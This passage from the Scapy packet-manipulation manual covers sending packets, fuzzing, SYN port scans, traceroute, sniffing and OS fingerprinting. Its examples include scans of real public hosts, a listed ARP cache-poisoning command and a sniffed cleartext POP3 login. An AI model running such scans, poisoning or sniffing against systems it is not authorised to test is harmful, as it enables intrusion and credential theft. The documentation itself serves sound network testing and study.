|>,\n <IP dst=66.35.250.150 |>, <IP dst=66.35.250.151 |>]\n >>> b=IP(ttl=[1,2,(5,9)])\n >>> b\n <IP ttl=[1, 2, (5, 9)] |>\n >>> [p for p in b]\n [<IP ttl=1 |>, <IP ttl=2 |>, <IP ttl=5 |>, <IP ttl=6 |>, \n <IP ttl=7 |>, <IP ttl=8 |>, <IP ttl=9 |>]\n >>> c=TCP(dport=[80,443])\n >>> [p for p in a/c]\n [<IP frag=0 proto=TCP dst=66.35.250.148 |<TCP dport=80 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.148 |<TCP dport=443 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.149 |<TCP dport=80 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.149 |<TCP dport=443 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.150 |<TCP dport=80 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.150 |<TCP dport=443 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.151 |<TCP dport=80 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.151 |<TCP dport=443 |>>]\n\nSome operations (like building the string from a packet) can't work on a set of packets. 
In these cases, if you forgot to unroll your set of packets, only the first element of the list you forgot to generate will be used to assemble the packet.\n\n=============== ====================================================\nCommand Effect\n=============== ====================================================\nsummary() displays a list of summaries of each packet \nnsummary() same as previous, with the packet number \nconversations() displays a graph of conversations \nshow() displays the preferred representation (usually nsummary()) \nfilter() returns a packet list filtered with a lambda function \nhexdump() returns a hexdump of all packets \nhexraw() returns a hexdump of the Raw layer of all packets \npadding() returns a hexdump of packets with padding \nnzpadding() returns a hexdump of packets with non-zero padding \nplot() plots a lambda function applied to the packet list \nmake table() displays a table according to a lambda function \n=============== ====================================================\n\n\n\nSending packets\n---------------\n\n.. index::\n single: Sending packets, send\n \nNow that we know how to manipulate packets. Let's see how to send them. The send() function will send packets at layer 3. That is to say, it will handle routing and layer 2 for you. The sendp() function will work at layer 2. It's up to you to choose the right interface and the right link layer protocol. send() and sendp() will also return sent packet list if return_packets=True is passed as parameter.\n\n::\n\n >>> send(IP(dst=\"1.2.3.4\")/ICMP())\n .\n Sent 1 packets.\n >>> sendp(Ether()/IP(dst=\"1.2.3.4\",ttl=(1,4)), iface=\"eth1\")\n ....\n Sent 4 packets.\n >>> sendp(\"I'm travelling on Ethernet\", iface=\"eth1\", loop=1, inter=0.2)\n ................^C\n Sent 16 packets.\n >>> sendp(rdpcap(\"/tmp/pcapfile\")) # tcpreplay\n ...........\n Sent 11 packets.\n \n Returns packets sent by send()\n >>> send(IP(dst='127.0.0.1'), return_packets=True)\n .\n Sent 1 packets.\n <PacketList: TCP:0 UDP:0 ICMP:0 Other:1>\n\n\nFuzzing\n-------\n\n.. index::\n single: fuzz(), fuzzing\n\nThe function fuzz() is able to change any default value that is not to be calculated (like checksums) by an object whose value is random and whose type is adapted to the field. This enables to quickly built fuzzing templates and send them in a loop. In the following example, the IP layer is normal, and the UDP and NTP layers are fuzzed. The UDP checksum will be correct, the UDP destination port will be overloaded by NTP to be 123 and the NTP version will be forced to be 4. All the other ports will be randomized. Note: If you use fuzz() in IP layer, src and dst parameter won't be random so in order to do that use RandIP().::\n\n >>> send(IP(dst=\"target\")/fuzz(UDP()/NTP(version=4)),loop=1)\n ................^C\n Sent 16 packets.\n\n\nSend and receive packets (sr)\n-----------------------------\n\n.. index::\n single: sr()\n\nNow, let's try to do some fun things. The sr() function is for sending packets and receiving answers. The function returns a couple of packet and answers, and the unanswered packets. The function sr1() is a variant that only returns one packet that answered the packet (or the packet set) sent. The packets must be layer 3 packets (IP, ARP, etc.). The function srp() do the same for layer 2 packets (Ethernet, 802.3, etc.). 
If there is, no response a None value will be assigned instead when the timeout is reached.\n\n::\n\n >>> p = sr1(IP(dst=\"www.slashdot.org\")/ICMP()/\"XXXXXXXXXXX\")\n Begin emission:\n ...Finished to send 1 packets.\n .*\n Received 5 packets, got 1 answers, remaining 0 packets\n >>> p\n <IP version=4L ihl=5L tos=0x0 len=39 id=15489 flags= frag=0L ttl=42 proto=ICMP\n chksum=0x51dd src=66.35.250.151 dst=192.168.5.21 options='' |<ICMP type=echo-reply\n code=0 chksum=0xee45 id=0x0 seq=0x0 |<Raw load='XXXXXXXXXXX'\n |<Padding load='\\x00\\x00\\x00\\x00' |>>>>\n >>> p.show()\n ---[ IP ]---\n version = 4L\n ihl = 5L\n tos = 0x0\n len = 39\n id = 15489\n flags = \n frag = 0L\n ttl = 42\n proto = ICMP\n chksum = 0x51dd\n src = 66.35.250.151\n dst = 192.168.5.21\n options = ''\n ---[ ICMP ]---\n type = echo-reply\n code = 0\n chksum = 0xee45\n id = 0x0\n seq = 0x0\n ---[ Raw ]---\n load = 'XXXXXXXXXXX'\n ---[ Padding ]---\n load = '\\x00\\x00\\x00\\x00'\n\n\n.. index::\n single: DNS, Etherleak\n\nA DNS query (``rd`` = recursion desired). The host 192.168.5.1 is my DNS server. Note the non-null padding coming from my Linksys having the Etherleak flaw::\n\n >>> sr1(IP(dst=\"192.168.5.1\")/UDP()/DNS(rd=1,qd=DNSQR(qname=\"www.slashdot.org\")))\n Begin emission:\n Finished to send 1 packets.\n ..*\n Received 3 packets, got 1 answers, remaining 0 packets\n <IP version=4L ihl=5L tos=0x0 len=78 id=0 flags=DF frag=0L ttl=64 proto=UDP chksum=0xaf38\n src=192.168.5.1 dst=192.168.5.21 options='' |<UDP sport=53 dport=53 len=58 chksum=0xd55d\n |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=ok qdcount=1 ancount=1\n nscount=0 arcount=0 qd=<DNSQR qname='www.slashdot.org.' qtype=A qclass=IN |> \n an=<DNSRR rrname='www.slashdot.org.' type=A rclass=IN ttl=3560L rdata='66.35.250.151' |>\n ns=0 ar=0 |<Padding load='\\xc6\\x94\\xc7\\xeb' |>>>>\n\nThe \"send'n'receive\" functions family is the heart of scapy. They return a couple of two lists. The first element is a list of couples (packet sent, answer), and the second element is the list of unanswered packets. These two elements are lists, but they are wrapped by an object to present them better, and to provide them with some methods that do most frequently needed actions::\n\n >>> sr(IP(dst=\"192.168.8.1\")/TCP(dport=[21,22,23]))\n Received 6 packets, got 3 answers, remaining 0 packets\n (<Results: UDP:0 TCP:3 ICMP:0 Other:0>, <Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>)\n >>> ans, unans = _\n >>> ans.summary()\n IP / TCP 192.168.8.14:20 > 192.168.8.1:21 S ==> Ether / IP / TCP 192.168.8.1:21 > 192.168.8.14:20 RA / Padding\n IP / TCP 192.168.8.14:20 > 192.168.8.1:22 S ==> Ether / IP / TCP 192.168.8.1:22 > 192.168.8.14:20 RA / Padding\n IP / TCP 192.168.8.14:20 > 192.168.8.1:23 S ==> Ether / IP / TCP 192.168.8.1:23 > 192.168.8.14:20 RA / Padding\n \nIf there is a limited rate of answers, you can specify a time interval to wait between two packets with the inter parameter. If some packets are lost or if specifying an interval is not enough, you can resend all the unanswered packets, either by calling the function again, directly with the unanswered list, or by specifying a retry parameter. If retry is 3, scapy will try to resend unanswered packets 3 times. If retry is -3, scapy will resend unanswered packets until no more answer is given for the same set of unanswered packets 3 times in a row. 
The timeout parameter specify the time to wait after the last packet has been sent::\n\n >>> sr(IP(dst=\"172.20.29.5/30\")/TCP(dport=[21,22,23]),inter=0.5,retry=-2,timeout=1)\n Begin emission:\n Finished to send 12 packets.\n Begin emission:\n Finished to send 9 packets.\n Begin emission:\n Finished to send 9 packets.\n \n Received 100 packets, got 3 answers, remaining 9 packets\n (<Results: UDP:0 TCP:3 ICMP:0 Other:0>, <Unanswered: UDP:0 TCP:9 ICMP:0 Other:0>)\n\n\nSYN Scans\n---------\n\n.. index::\n single: SYN Scan\n\nClassic SYN Scan can be initialized by executing the following command from Scapy's prompt::\n\n >>> sr1(IP(dst=\"72.14.207.99\")/TCP(dport=80,flags=\"S\"))\n\nThe above will send a single SYN packet to Google's port 80 and will quit after receiving a single response::\n\n Begin emission:\n .Finished to send 1 packets.\n *\n Received 2 packets, got 1 answers, remaining 0 packets\n <IP version=4L ihl=5L tos=0x20 len=44 id=33529 flags= frag=0L ttl=244\n proto=TCP chksum=0x6a34 src=72.14.207.99 dst=192.168.1.100 options=// |\n <TCP sport=www dport=ftp-data seq=2487238601L ack=1 dataofs=6L reserved=0L\n flags=SA window=8190 chksum=0xcdc7 urgptr=0 options=[('MSS', 536)] |\n <Padding load='V\\xf7' |>>>\n\nFrom the above output, we can see Google returned “SA” or SYN-ACK flags indicating an open port.\n\nUse either notations to scan ports 400 through 443 on the system:\n\n >>> sr(IP(dst=\"192.168.1.1\")/TCP(sport=666,dport=(440,443),flags=\"S\"))\n\nor\n\n >>> sr(IP(dst=\"192.168.1.1\")/TCP(sport=RandShort(),dport=[440,441,442,443],flags=\"S\"))\n\nIn order to quickly review responses simply request a summary of collected packets::\n\n >>> ans, unans = _\n >>> ans.summary()\n IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:440 S ======> IP / TCP 192.168.1.1:440 > 192.168.1.100:ftp-data RA / Padding\n IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:441 S ======> IP / TCP 192.168.1.1:441 > 192.168.1.100:ftp-data RA / Padding\n IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:442 S ======> IP / TCP 192.168.1.1:442 > 192.168.1.100:ftp-data RA / Padding\n IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:https S ======> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp-data SA / Padding\n\nThe above will display stimulus/response pairs for answered probes. We can display only the information we are interested in by using a simple loop:\n\n >>> ans.summary( lambda(s,r): r.sprintf(\"%TCP.sport% \\t %TCP.flags%\") )\n 440 RA\n 441 RA\n 442 RA\n https SA\n\nEven better, a table can be built using the ``make_table()`` function to display information about multiple targets::\n\n >>> ans, unans = sr(IP(dst=[\"192.168.1.1\",\"yahoo.com\",\"slashdot.org\"])/TCP(dport=[22,80,443],flags=\"S\"))\n Begin emission:\n .......*.**.......Finished to send 9 packets.\n **.*.*..*..................\n Received 362 packets, got 8 answers, remaining 1 packets\n >>> ans.make_table(\n ... lambda(s,r): (s.dst, s.dport,\n ... r.sprintf(\"{TCP:%TCP.flags%}{ICMP:%IP.src% - %ICMP.type%}\")))\n 66.35.250.150 192.168.1.1 216.109.112.135 \n 22 66.35.250.150 - dest-unreach RA - \n 80 SA RA SA \n 443 SA SA SA \n\nThe above example will even print the ICMP error type if the ICMP packet was received as a response instead of expected TCP.\n\nFor larger scans, we could be interested in displaying only certain responses. 
The example below will only display packets with the “SA” flag set::\n\n >>> ans.nsummary(lfilter = lambda (s,r): r.sprintf(\"%TCP.flags%\") == \"SA\")\n 0003 IP / TCP 192.168.1.100:ftp_data > 192.168.1.1:https S ======> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp_data SA\n\nIn case we want to do some expert analysis of responses, we can use the following command to indicate which ports are open::\n\n >>> ans.summary(lfilter = lambda (s,r): r.sprintf(\"%TCP.flags%\") == \"SA\",prn=lambda(s,r):r.sprintf(\"%TCP.sport% is open\"))\n https is open\n\nAgain, for larger scans we can build a table of open ports::\n\n >>> ans.filter(lambda (s,r):TCP in r and r[TCP].flags&2).make_table(lambda (s,r): \n ... (s.dst, s.dport, \"X\"))\n 66.35.250.150 192.168.1.1 216.109.112.135 \n 80 X - X \n 443 X X X\n\nIf all of the above methods were not enough, Scapy includes a report_ports() function which not only automates the SYN scan, but also produces a LaTeX output with collected results::\n\n >>> report_ports(\"192.168.1.1\",(440,443))\n Begin emission:\n ...*.**Finished to send 4 packets.\n *\n Received 8 packets, got 4 answers, remaining 0 packets\n '\\\\begin{tabular}{|r|l|l|}\\n\\\\hline\\nhttps & open & SA \\\\\\\\\\n\\\\hline\\n440\n & closed & TCP RA \\\\\\\\\\n441 & closed & TCP RA \\\\\\\\\\n442 & closed & \n TCP RA \\\\\\\\\\n\\\\hline\\n\\\\hline\\n\\\\end{tabular}\\n'\n\n\nTCP traceroute\n--------------\n\n.. index::\n single: Traceroute\n\nA TCP traceroute::\n\n >>> ans, unans = sr(IP(dst=target, ttl=(4,25),id=RandShort())/TCP(flags=0x2))\n *****.******.*.***..*.**Finished to send 22 packets.\n ***......\n Received 33 packets, got 21 answers, remaining 1 packets\n >>> for snd,rcv in ans:\n ... print snd.ttl, rcv.src, isinstance(rcv.payload, TCP)\n ... 
\n 5 194.51.159.65 0\n 6 194.51.159.49 0\n 4 194.250.107.181 0\n 7 193.251.126.34 0\n 8 193.251.126.154 0\n 9 193.251.241.89 0\n 10 193.251.241.110 0\n 11 193.251.241.173 0\n 13 208.172.251.165 0\n 12 193.251.241.173 0\n 14 208.172.251.165 0\n 15 206.24.226.99 0\n 16 206.24.238.34 0\n 17 173.109.66.90 0\n 18 173.109.88.218 0\n 19 173.29.39.101 1\n 20 173.29.39.101 1\n 21 173.29.39.101 1\n 22 173.29.39.101 1\n 23 173.29.39.101 1\n 24 173.29.39.101 1\n\nNote that the TCP traceroute and some other high-level functions are already coded::\n\n >>> lsc()\n sr : Send and receive packets at layer 3\n sr1 : Send packets at layer 3 and return only the first answer\n srp : Send and receive packets at layer 2\n srp1 : Send and receive packets at layer 2 and return only the first answer\n srloop : Send a packet at layer 3 in loop and print the answer each time\n srploop : Send a packet at layer 2 in loop and print the answer each time\n sniff : Sniff packets\n p0f : Passive OS fingerprinting: which OS emitted this TCP SYN ?\n arpcachepoison : Poison target's cache with (your MAC,victim's IP) couple\n send : Send packets at layer 3\n sendp : Send packets at layer 2\n traceroute : Instant TCP traceroute\n arping : Send ARP who-has requests to determine which hosts are up\n ls : List available layers, or infos on a given layer\n lsc : List user commands\n queso : Queso OS fingerprinting\n nmap_fp : nmap fingerprinting\n report_ports : portscan a target and output a LaTeX table\n dyndns_add : Send a DNS add message to a nameserver for \"name\" to have a new \"rdata\"\n dyndns_del : Send a DNS delete message to a nameserver for \"name\"\n [...]\n\nScapy may also use the GeoIP2 module, in combination with matplotlib and `cartopy <http://scitools.org.uk/cartopy/docs/latest/installing.html>`_ to generate fancy graphics such as below:\n\n.. image:: graphics/traceroute_worldplot.png\n\nIn this example, we used the `traceroute_map()` function to print the graphic. This method is a shortcut which uses the `world_trace` of the `TracerouteResult` objects.\nIt could have been done differently:\n\n >>> conf.geoip_city = \"path/to/GeoLite2-City.mmdb\"\n >>> a = traceroute(\"www.google.co.uk\", verbose=0)[0]\n >>> b = traceroute(\"www.secdev.org\", verbose=0)[0]\n >>> a.res += b.res\n >>> a.world_trace()\n\nor such as above:\n\n >>> conf.geoip_city = \"path/to/GeoLite2-City.mmdb\"\n >>> traceroute_map(\"www.google.co.uk\", \"www.secdev.org\")\n\nTo use those functions, it is required to have installed the `geoip2 <https://pypi.python.org/pypi/geoip2>`_ module, `its database <https://dev.maxmind.com/geoip/geoip2/geolite2/>`_ (`direct download <https://geolite.maxmind.com/download/geoip/database/GeoLite2-City.tar.gz>`_)\nbut also the `cartopy <http://scitools.org.uk/cartopy/docs/latest/installing.html>`_ module.\n\nConfiguring super sockets\n-------------------------\n\n.. index::\n single: super socket\n\nThe process of sending packets and receiving is quite complicated. As I wanted to use the PF_PACKET interface to go through netfilter, I also needed to implement an ARP stack and ARP cache, and a LL stack. Well it seems to work, on ethernet and PPP interfaces, but I don't guarantee anything. Anyway, the fact I used a kind of super-socket for that mean that you can switch your IO layer very easily, and use PF_INET/SOCK_RAW, or use PF_PACKET at level 2 (giving the LL header (ethernet,...) and giving yourself mac addresses, ...). 
I've just added a super socket which use libdnet and libpcap, so that it should be portable::\n\n >>> conf.L3socket=L3dnetSocket\n >>> conf.L3listen=L3pcapListenSocket\n\nSniffing\n--------\n\n.. index::\n single: sniff()\n\nWe can easily capture some packets or even clone tcpdump or tshark. Either one interface or a list of interfaces to sniff on can be provided. If no interface is given, sniffing will happen on ``conf.iface``::\n\n >>> sniff(filter=\"icmp and host 66.35.250.151\", count=2)\n <Sniffed: UDP:0 TCP:0 ICMP:2 Other:0>\n >>> a=_\n >>> a.nsummary()\n 0000 Ether / IP / ICMP 192.168.5.21 echo-request 0 / Raw\n 0001 Ether / IP / ICMP 192.168.5.21 echo-request 0 / Raw\n >>> a[1]\n <Ether dst=00:ae:f3:52:aa:d1 src=00:02:15:37:a2:44 type=0x800 |<IP version=4L\n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=ICMP chksum=0x3831\n src=192.168.5.21 dst=66.35.250.151 options='' |<ICMP type=echo-request code=0\n chksum=0x6571 id=0x8745 seq=0x0 |<Raw load='B\\xf7g\\xda\\x00\\x07um\\x08\\t\\n\\x0b\n \\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\n \\x1e\\x1f !\\x22#$%&\\'()*+,-./01234567' |>>>>\n >>> sniff(iface=\"wifi0\", prn=lambda x: x.summary())\n 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133\n 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates\n 802.11 Management 5 00:0a:41:ee:a5:50 / 802.11 Probe Response / Info SSID / Info Rates / Info DSset / Info 133\n 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates\n 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates\n 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133\n 802.11 Management 11 00:07:50:d6:44:3f / 802.11 Authentication\n 802.11 Management 11 00:0a:41:ee:a5:50 / 802.11 Authentication\n 802.11 Management 0 00:07:50:d6:44:3f / 802.11 Association Request / Info SSID / Info Rates / Info 133 / Info 149\n 802.11 Management 1 00:0a:41:ee:a5:50 / 802.11 Association Response / Info Rates / Info 133 / Info 149\n 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133\n 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133\n 802.11 / LLC / SNAP / ARP who has 172.20.70.172 says 172.20.70.171 / Padding\n 802.11 / LLC / SNAP / ARP is at 00:0a:b7:4b:9c:dd says 172.20.70.172 / Padding\n 802.11 / LLC / SNAP / IP / ICMP echo-request 0 / Raw\n 802.11 / LLC / SNAP / IP / ICMP echo-reply 0 / Raw\n >>> sniff(iface=\"eth1\", prn=lambda x: x.show())\n ---[ Ethernet ]---\n dst = 00:ae:f3:52:aa:d1\n src = 00:02:15:37:a2:44\n type = 0x800\n ---[ IP ]---\n version = 4L\n ihl = 5L\n tos = 0x0\n len = 84\n id = 0\n flags = DF\n frag = 0L\n ttl = 64\n proto = ICMP\n chksum = 0x3831\n src = 192.168.5.21\n dst = 66.35.250.151\n options = ''\n ---[ ICMP ]---\n type = echo-request\n code = 0\n chksum = 0x89d9\n id = 0xc245\n seq = 0x0\n ---[ Raw ]---\n load = 'B\\xf7i\\xa9\\x00\\x04\\x149\\x08\\t\\n\\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f !\\x22#$%&\\'()*+,-./01234567'\n ---[ Ethernet ]---\n dst = 00:02:15:37:a2:44\n src = 00:ae:f3:52:aa:d1\n type = 0x800\n ---[ IP ]---\n version = 4L\n ihl = 5L\n tos = 0x0\n len = 84\n id = 2070\n flags = \n frag = 0L\n ttl = 42\n proto = ICMP\n chksum = 0x861b\n src = 
66.35.250.151\n dst = 192.168.5.21\n options = ''\n ---[ ICMP ]---\n type = echo-reply\n code = 0\n chksum = 0x91d9\n id = 0xc245\n seq = 0x0\n ---[ Raw ]---\n load = 'B\\xf7i\\xa9\\x00\\x04\\x149\\x08\\t\\n\\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f !\\x22#$%&\\'()*+,-./01234567'\n ---[ Padding ]---\n load = '\\n_\\x00\\x0b'\n >>> sniff(iface=[\"eth1\",\"eth2\"], prn=lambda x: x.sniffed_on+\": \"+x.summary())\n eth3: Ether / IP / ICMP 192.168.5.21 > 66.35.250.151 echo-request 0 / Raw \n eth3: Ether / IP / ICMP 66.35.250.151 > 192.168.5.21 echo-reply 0 / Raw \n eth2: Ether / IP / ICMP 192.168.5.22 > 66.35.250.152 echo-request 0 / Raw \n eth2: Ether / IP / ICMP 66.35.250.152 > 192.168.5.22 echo-reply 0 / Raw\n\nFor even more control over displayed information we can use the ``sprintf()`` function::\n\n >>> pkts = sniff(prn=lambda x:x.sprintf(\"{IP:%IP.src% -> %IP.dst%\\n}{Raw:%Raw.load%\\n}\"))\n 192.168.1.100 -> 64.233.167.99\n \n 64.233.167.99 -> 192.168.1.100\n \n 192.168.1.100 -> 64.233.167.99\n \n 192.168.1.100 -> 64.233.167.99\n 'GET / HTTP/1.1\\r\\nHost: 64.233.167.99\\r\\nUser-Agent: Mozilla/5.0 \n (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy)\n Firefox/2.0.0.8\\r\\nAccept: text/xml,application/xml,application/xhtml+xml,\n text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\r\\nAccept-Language:\n en-us,en;q=0.5\\r\\nAccept-Encoding: gzip,deflate\\r\\nAccept-Charset:\n ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\nKeep-Alive: 300\\r\\nConnection:\n keep-alive\\r\\nCache-Control: max-age=0\\r\\n\\r\\n'\n \nWe can sniff and do passive OS fingerprinting::\n\n >>> p\n <Ether dst=00:10:4b:b3:7d:4e src=00:40:33:96:7b:60 type=0x800 |<IP version=4L\n ihl=5L tos=0x0 len=60 id=61681 flags=DF frag=0L ttl=64 proto=TCP chksum=0xb85e\n src=192.168.8.10 dst=192.168.8.1 options='' |<TCP sport=46511 dport=80\n seq=2023566040L ack=0L dataofs=10L reserved=0L flags=SEC window=5840\n chksum=0x570c urgptr=0 options=[('Timestamp', (342940201L, 0L)), ('MSS', 1460),\n ('NOP', ()), ('SAckOK', ''), ('WScale', 0)] |>>>\n >>> load_module(\"p0f\")\n >>> p0f(p)\n (1.0, ['Linux 2.4.2 - 2.4.14 (1)'])\n >>> a=sniff(prn=prnp0f)\n (1.0, ['Linux 2.4.2 - 2.4.14 (1)'])\n (1.0, ['Linux 2.4.2 - 2.4.14 (1)'])\n (0.875, ['Linux 2.4.2 - 2.4.14 (1)', 'Linux 2.4.10 (1)', 'Windows 98 (?)'])\n (1.0, ['Windows 2000 (9)'])\n\nThe number before the OS guess is the accuracy of the guess.\n\nFilters\n-------\n\n.. 
index::\n single: filter, sprintf()\n\nDemo of both bpf filter and sprintf() method::\n\n >>> a=sniff(filter=\"tcp and ( port 25 or port 110 )\",\n prn=lambda x: x.sprintf(\"%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport% %2s,TCP.flags% : %TCP.payload%\"))\n 192.168.8.10:47226 -> 213.228.0.14:110 S : \n 213.228.0.14:110 -> 192.168.8.10:47226 SA : \n 192.168.8.10:47226 -> 213.228.0.14:110 A : \n 213.228.0.14:110 -> 192.168.8.10:47226 PA : +OK <13103.1048117923@pop2-1.free.fr>\n \n 192.168.8.10:47226 -> 213.228.0.14:110 A : \n 192.168.8.10:47226 -> 213.228.0.14:110 PA : USER toto\n \n 213.228.0.14:110 -> 192.168.8.10:47226 A : \n 213.228.0.14:110 -> 192.168.8.10:47226 PA : +OK \n \n 192.168.8.10:47226 -> 213.228.0.14:110 A : \n 192.168.8.10:47226 -> 213.228.0.14:110 PA : PASS tata\n \n 213.228.0.14:110 -> 192.168.8.10:47226 PA : -ERR authorization failed\n \n 192.168.8.10:47226 -> 213.228.0.14:110 A : \n 213.228.0.14:110 -> 192.168.8.10:47226 FA : \n 192.168.8.10:47226 -> 213.228.0.14:110 FA : \n 213.228.0.14:110 -> 192.168.8.10:47226 A : \n\nSend and receive in a loop \n--------------------------\n\n.. index::\n single: srloop()\n\nHere is an example of a (h)ping-like functionality : you always send the same set of packets to see if something change::\n\n >>> srloop(IP(dst=\"www.target.com/30\")/TCP())\n RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding\n fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S\n RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding\n fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S\n RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding\n fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S\n RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding\n fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S\n\n\nImporting and Exporting Data\n----------------------------\nPCAP\n^^^^\n\nIt is often useful to save capture packets to pcap file for use at later time or with different applications::\n\n >>> wrpcap(\"temp.cap\",pkts)\n\nTo restore previously saved pcap file:\n\n >>> pkts = rdpcap(\"temp.cap\")\n\nor\n\n >>> pkts = sniff(offline=\"temp.cap\")\n\nHexdump\n^^^^^^^\n\nScapy allows you to export recorded packets in various hex formats.\n\nUse ``hexdump()`` to display one or more packets using classic hexdump format::\n\n >>> hexdump(pkt)\n 0000 00 50 56 FC CE 50 00 0C 29 2B 53 19 08 00 45 00 .PV..P..)+S...E.\n 0010 00 54 00 00 40 00 40 01 5A 7C C0 A8 19 82 04 02 .T..@.@.Z|......\n 0020 02 01 08 00 9C 90 5A 61 00 01 E6 DA 70 49 B6 E5 ......Za....pI..\n 0030 08 00 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 ................\n 0040 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 .......... 
!\"#$%\n 0050 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &'()*+,-./012345\n 0060 36 37 67\n\nHexdump above can be reimported back into Scapy using ``import_hexcap()``::\n\n >>> pkt_hex = Ether(import_hexcap())\n 0000 00 50 56 FC CE 50 00 0C 29 2B 53 19 08 00 45 00 .PV..P..)+S...E.\n 0010 00 54 00 00 40 00 40 01 5A 7C C0 A8 19 82 04 02 .T..@.@.Z|......\n 0020 02 01 08 00 9C 90 5A 61 00 01 E6 DA 70 49 B6 E5 ......Za....pI..\n 0030 08 00 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 ................\n 0040 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 .......... !\"#$%\n 0050 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &'()*+,-./012345\n 0060 36 37 67\n >>> pkt_hex\n <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L \n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c \n src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 \n chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\\x08\\t\\n\n \\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\n \\x1f !\"#$%&\\'()*+,-./01234567' |>>>>\n\nBinary string\n^^^^^^^^^^^^^\n\nYou can also convert entire packet into a binary string using the ``raw()`` function::\n\n >>> pkts = sniff(count = 1)\n >>> pkt = pkts[0]\n >>> pkt\n <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L \n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c \n src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 \n chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\\x08\\t\\n\n \\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\n \\x1f !\"#$%&\\'()*+,-./01234567' |>>>>\n >>> pkt_raw = raw(pkt)\n >>> pkt_raw\n '\\x00PV\\xfc\\xceP\\x00\\x0c)+S\\x19\\x08\\x00E\\x00\\x00T\\x00\\x00@\\x00@\\x01Z|\\xc0\\xa8\n \\x19\\x82\\x04\\x02\\x02\\x01\\x08\\x00\\x9c\\x90Za\\x00\\x01\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\n 